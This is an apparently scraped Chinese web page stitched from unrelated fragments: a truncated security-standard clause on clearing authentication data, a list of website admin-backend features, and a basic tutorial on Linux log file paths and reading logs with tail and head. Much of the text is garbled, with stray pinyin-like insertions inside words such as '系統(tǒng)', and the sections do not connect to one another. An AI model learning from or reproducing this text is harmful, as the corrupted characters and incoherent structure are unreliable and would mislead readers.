a) 應保證操作系統(tǒng)和數(shù)據(jù)庫系統(tǒng)用戶的鑒別信息所在的存儲空間，被釋放或再分配給其他用戶前得到完全清除，無論這些信息是存放在硬盤上還是在內(nèi)存中；

b)...

通常我們只能看到一個網(wǎng)站的前臺頁面，對于網(wǎng)站后臺只有站長在擁有賬號的情況下可以進入后臺，那么網(wǎng)站后臺管理系統(tǒng)都有哪些管理功能?

第一：網(wǎng)站的系統(tǒng)管理：管理員管理，也稱權(quán)限管理?？梢孕略龉芾韱T及修改管理員密碼;數(shù)據(jù)庫備份，為保證您的數(shù)據(jù)安全本系統(tǒng)采用了數(shù)據(jù)庫備份功能;上傳文件管理，管理你增加產(chǎn)品時上傳的圖片及其他文件。

第二：產(chǎn)品管理：產(chǎn)品類別新增修改管理，產(chǎn)品添加修改以及產(chǎn)品的審核。

第三：企業(yè)信息：可設(shè)置修改企業(yè)的各類信息及介紹。

第四：訂單管理：查看訂單的詳細信息及訂單處理。

第五：會員管理：查看修改刪除會員資料，及鎖定解鎖功能可在線給會員發(fā)信。

第六：新聞管理：能分大類和小類新聞，不再受新聞欄目的限制。

第七: 留言管理：管理信息反饋及注冊會員的留言，注冊會員的留言可在線回復，未注冊會員可使用在線發(fā)信功能給于答復。

第八: 營銷網(wǎng)絡(luò)：修改營銷網(wǎng)絡(luò)欄目的信息。

第九：友情鏈接：新增修改友情鏈接。

第十：全新模版功能，在線編輯修改模版。

第十一：全新掛接數(shù)據(jù)庫，在線表編輯，添加數(shù)據(jù)表，編輯數(shù)據(jù)庫，加添編輯文件掛接網(wǎng)站等等。

第十二：系統(tǒng)日志功能，每一步操作都有記錄，系統(tǒng)更安全。

第十三：中英文切換，簡體繁體切換。

第十四：還有多開源的代碼，以便站長二次開發(fā)。

每個網(wǎng)站的后臺可能都會不太一樣，但是大體的功能都差不多，大家做一個簡單的了解即可。

Linux系統(tǒng)，不是可視化頁面，不能直接提示錯誤信息，我們只能通過系統(tǒng)日志來分析。來我們用Vmware裝一個虛擬機來演示一下：

首先我們來確認系統(tǒng)日志在什么地方？

一般系統(tǒng)日志都放在/var/log/目錄下面，我們進入該目錄下面，進行查看，

log文件下包含了各種日志，我們要區(qū)分開來：

例如我的機子里面包括mysql、yum等日志，可以來分析mysql和yum的信息。

那么系統(tǒng)日志有哪些呢？

常用的系統(tǒng)日志如下:

核心啟動日志:/var/log/dmesg

系統(tǒng)報錯日志:/var/log/messages

郵件系統(tǒng)日志:/var/log/maillog

FTP系統(tǒng)日志:/var/log/xferlog

安全信息和系統(tǒng)登錄與網(wǎng)絡(luò)連接的信息:/var/log/secure

登錄記錄:/var/log/wtmp 記錄登錄者訊錄，二進制文件，須用last來讀取內(nèi)容 who -u /var/log/wtmp 查看信息

News日志:/var/log/spooler

RPM軟件包:/var/log/rpmpkgs

XFree86日志:/var/log/XFree86.0.log

引導日志:/var/log/boot.log 記錄開機啟動訊息，dmesg | more

cron(定制任務日志)日志:/var/log/cron

安全信息和系統(tǒng)登錄與網(wǎng)絡(luò)連接的信息:/var/log/secure

文件 /var/run/utmp 記錄著現(xiàn)在登入的用戶。

文件 /var/log/wtmp 記錄所有的登入和登出。

文件 /var/log/lastlog 記錄每個用戶最後的登入信息。

文件 /var/log/btmp 記錄錯誤的登入嘗試。

less /var/log/auth.log 需要身份確認的操作

需要使用哪個日志文件，查找什么信息，我們就tail或者head，那么問題來了，怎么tail和head？可以使用系統(tǒng)幫助命令man命令，學習tail和head

tail -n 10 filename.log執(zhí)行這個命令，查詢?nèi)罩疚膊孔詈?0行的日志;

head -n 20 filename.log執(zhí)行這個命令，查詢?nèi)罩厩安?0行的日志